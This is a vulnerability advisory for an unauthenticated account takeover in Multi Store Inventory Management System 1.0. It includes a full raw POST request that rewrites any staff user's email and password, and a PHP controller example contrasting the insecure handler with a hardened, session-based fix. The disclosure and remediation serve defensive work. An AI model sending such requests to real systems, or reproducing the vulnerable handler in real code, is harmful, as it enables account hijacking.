Multi Store Inventory Management System version 1.0 suffers from an account takeover vulnerability due to missing authorization controls.
e6feb7f442646bfe2e6bd718321e6b7a
# Exploit Title: Multi Store Inventory Management System - Account Takeover (Unauthenticated)
# Date: 04/04/2022
# Exploit Author: Saud Alenazi
# Vendor Homepage: https://www.bdtask.com/
# Software Link: https://www.campcodes.com/projects/php/complete-multi-store-inventory-management-system-in-php-mysql/
# Version: 1.0
# Tested on: XAMPP, Windows 10
# Contact: https://twitter.com/dmaral3noz
# Description:
An attacker can take over any registered 'Staff' user account by sending the POST request below
and changing the "id", "email", "password", "firstname" and "lastname" parameters. The endpoint
applies the update to whichever user row the client-supplied "id" names, without checking that
the caller is authenticated or owns that row.
# Steps to Reproduce:
1. Send the POST request below, changing the "id", "email" and "password" parameters.
2. Log in to the targeted user account with the changed email and password.
################################################
POST /multistore_demo/dashboard/home/setting HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------246162487211952414471071914687
Content-Length: 1645
Origin: http://localhost
Connection: close
Referer: http://localhost/multistore_demo/dashboard/home/setting
Cookie: ci_session=31504fa8fdcd43505beff1b210056ec12d5d8405
Upgrade-Insecure-Requests: 1

-----------------------------246162487211952414471071914687
Content-Disposition: form-data; name="id"

1
-----------------------------246162487211952414471071914687
Content-Disposition: form-data; name="firstname"

saud
-----------------------------246162487211952414471071914687
Content-Disposition: form-data; name="lastname"

test
-----------------------------246162487211952414471071914687
Content-Disposition: form-data; name="email"

[email protected]
-----------------------------246162487211952414471071914687
Content-Disposition: form-data; name="password"

admin123
-----------------------------246162487211952414471071914687
Content-Disposition: form-data; name="about"


-----------------------------246162487211952414471071914687
Content-Disposition: form-data; name="old_image"


-----------------------------246162487211952414471071914687
Content-Disposition: form-data; name="image"; filename=""
Content-Type: application/octet-stream


-----------------------------246162487211952414471071914687--
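The root cause described above is a profile-update handler that trusts the client-supplied "id" and performs no authentication or ownership check. The following is an added illustration, not the vendor's code: a hypothetical CodeIgniter 3 style controller (the framework is inferred from the ci_session cookie; the class, model, table and column names are assumptions) showing the vulnerable shape next to a hardened one that derives the target row from the server-side session and re-authenticates before credential changes.

```php
<?php
// Added example, not the vendor's code. CodeIgniter 3 style is assumed from the
// ci_session cookie in the advisory; 'user' table and column names are hypothetical.

class Home extends CI_Controller
{
    // Vulnerable shape: the row to update is chosen by the request's "id" field and
    // no session check is performed, so any request can rewrite any user's
    // email and password. This mirrors the behaviour the advisory describes.
    public function setting_vulnerable()
    {
        $data = [
            'firstname' => $this->input->post('firstname'),
            'lastname'  => $this->input->post('lastname'),
            'email'     => $this->input->post('email'),
            'password'  => $this->input->post('password'),
        ];
        $this->db->where('id', $this->input->post('id'))->update('user', $data);
    }

    // Hardened shape: require an authenticated session, ignore any "id" in the
    // body, update only the caller's own row, hash the password, and gate
    // email/password changes on the current password.
    public function setting()
    {
        $user_id = $this->session->userdata('user_id');
        if (empty($user_id)) {
            show_error('Authentication required', 401);
            return;
        }

        $current = $this->db->get_where('user', ['id' => $user_id])->row();
        if ($current === null) {
            show_error('Forbidden', 403);
            return;
        }

        // Non-sensitive profile fields; xss_clean applied via the second argument.
        $data = [
            'firstname' => $this->input->post('firstname', TRUE),
            'lastname'  => $this->input->post('lastname', TRUE),
        ];

        $new_password = (string) $this->input->post('password');
        $new_email    = $this->input->post('email', TRUE);
        $wants_credential_change = $new_password !== ''
            || ($new_email !== null && $new_email !== $current->email);

        if ($wants_credential_change) {
            // Re-authenticate so a stolen or fixated session alone cannot
            // rotate the account's email or password.
            $current_password = (string) $this->input->post('current_password');
            if (!password_verify($current_password, $current->password)) {
                show_error('Current password required to change email or password', 403);
                return;
            }
            if ($new_email !== null && filter_var($new_email, FILTER_VALIDATE_EMAIL)) {
                $data['email'] = $new_email;
            }
            if ($new_password !== '') {
                $data['password'] = password_hash($new_password, PASSWORD_DEFAULT);
            }
        }

        // The WHERE clause comes from the session, never from the request body.
        $this->db->where('id', $user_id)->update('user', $data);
        redirect('dashboard/home/setting');
    }
}
```

The key control is that the hardened handler never reads "id" from the request at all: the session decides which row is written, so renaming or spoofing the parameter has no effect. Requiring the current password for email and password changes also limits the blast radius of a leaked session cookie, and a detection rule for this class of bug can alert on settings updates where the session's user id and the submitted "id" differ.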